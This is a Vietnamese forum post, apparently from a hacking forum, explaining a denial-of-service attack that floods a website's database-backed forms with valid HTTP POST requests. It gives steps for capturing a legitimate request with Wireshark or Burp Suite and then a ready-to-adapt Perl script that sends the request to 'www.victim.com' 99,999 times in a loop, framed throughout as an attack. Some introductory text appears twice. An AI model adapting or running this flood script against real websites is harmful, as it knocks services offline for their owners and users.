DoS với HTTP POST
Trang 1 trong tổng số 1 trang
DoS với HTTP POST
Trên một số website có sử dụng một số chức năng truy vấn vào CSDL như tìm kiếm, đăng ký thành viên,.... Nếu site đó không dùng các biện pháp hạn chế để bảo vệ (như giới hạn thời gian, dùng ảnh xác nhận,...) thì phương pháp này tỏ ra hữu hiệu!
Attacker sẽ gửi hàng loạt các dữ liệu hợp lệ dẫn đến Server sẽ xử lý làm tràn database và nghẽn hệ thống.
Vd sau dùng ngôn ngữ Perl để tấn công!
Bước 1, ta sẽ lấy thông tin về 1 POST hợp lệ bằng cách truy cập bình thường vào website và sniff trong quá trình thực thi trên web (dùng phần mềm như Wireshark) hoặc dùng 1 phần mềm làm proxy (Burpsuite) để giữ lại.
Bước 2: hiệu chỉnh đoạn code sau theo các thông số có ở Bước 1
Code:
Attacker sẽ gửi hàng loạt các dữ liệu hợp lệ dẫn đến Server sẽ xử lý làm tràn database và nghẽn hệ thống.
Vd sau dùng ngôn ngữ Perl để tấn công!
Bước 1, ta sẽ lấy thông tin về 1 POST hợp lệ bằng cách truy cập bình thường vào website và sniff trong quá trình thực thi trên web (dùng phần mềm như Wireshark) hoặc dùng 1 phần mềm làm proxy (Burpsuite) để giữ lại.
Bước 2: hiệu chỉnh đoạn code sau theo các thông số có ở Bước 1
Code:
- Code:
#!/usr/bin/perl
use IO::Socket;
$x = 0;
$host = "www.victim.com";
$pth = "/";
while($x != 99999)
{
$postit = "giá trị cần POST";
$lrg = length $postit;
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nCo loi xay ra: $!\n" unless $sock;
print $sock "POST $pth"."file.php?bien=xxx HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
syswrite STDOUT, "Dang DoS";
$x++;
}
Similar topics
» Video xâm nhập http://thanhnhon.edu.vn
» ARP Spoofing HTTP infection malware
» Thực tập DDOS thông qua HTTP GET
» ARP Spoofing HTTP infection malware
» Thực tập DDOS thông qua HTTP GET
Trang 1 trong tổng số 1 trang
Permissions in this forum:
Bạn không có quyền trả lời bài viết
27/8/2013, 11:45 am by echcondihoc
» Quản Lí Tiến Trình Dùng Thư Viện PSAPI
11/10/2011, 9:42 pm by CNTT_DH
» xin tai lieu tieng viet
31/8/2011, 6:59 am by bantoisg
» Theo dõi tiến trình
27/8/2011, 5:51 pm by haigaopro01
» Giải pháp Bảo mật của Cisco
17/6/2011, 8:50 am by admin
» Nghiên cứu và đưa ra giải pháp phòng chống tấn công DoS, DDoS (Phần 1)
16/6/2011, 2:32 pm by admin
» Learn to hack !
16/6/2011, 8:49 am by admin
» Giải pháp hệ thống dành cho doanh nghiệp với thiết bị mạng Fortinet (Phần 1)
15/6/2011, 11:12 am by admin
» Ô Long Viên (Tập II)
27/9/2010, 4:56 pm by root
» những ebook về hack tiếng việt cho người mới tìm hiểu.
27/9/2010, 4:54 pm by root